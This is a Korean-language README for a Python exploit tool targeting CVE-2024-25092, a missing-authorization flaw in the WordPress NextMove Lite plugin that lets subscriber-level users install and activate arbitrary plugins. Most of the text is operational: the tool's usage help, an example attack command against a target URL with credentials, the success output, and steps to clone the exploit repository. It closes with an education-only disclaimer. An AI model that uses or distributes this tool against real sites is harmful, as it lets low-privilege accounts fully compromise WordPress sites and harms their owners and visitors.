
WordPress NextMove Lite 플러그인 <= 2.17.0 - 구독자+ 임의 플러그인 설치/활성화 취약점
CVE-2024-25092는 WordPress NextMove Lite 플러그인 (버전 <= 2.17.0)에 영향을 미치는 높은 심각도의 취약점입니다. 이 취약점은 권한 확인 누락으로 인해 subscriber+ 사용자가 WordPress 사이트에서 임의의 플러그인을 설치하고 활성화할 수 있게 합니다.
WordPress용 XLPlugins NextMove Lite 플러그인에는 승인 누락 취약점이 있어, subscriber 수준 이상의 인증된 사용자가 임의의 플러그인 설치 및 활성화를 수행할 수 있습니다. 이로 인해 WordPress 사이트가 완전히 손상될 수 있습니다.
제공된 Python 스크립트는 WordPress 사이트에 로그인하고 지정된 플러그인을 설치하여 이 취약점의 악용을 자동화합니다.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requests 라이브러리저장소를 클론합니다:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
필요한 Python 패키지를 설치합니다:
pip install requests
이 스크립트는 교육 목적으로만 제공됩니다. 책임감 있게 사용하고, 명시적인 허가를 받은 시스템에서만 사용하십시오. 이 스크립트의 무단 사용은 불법이며 비윤리적입니다.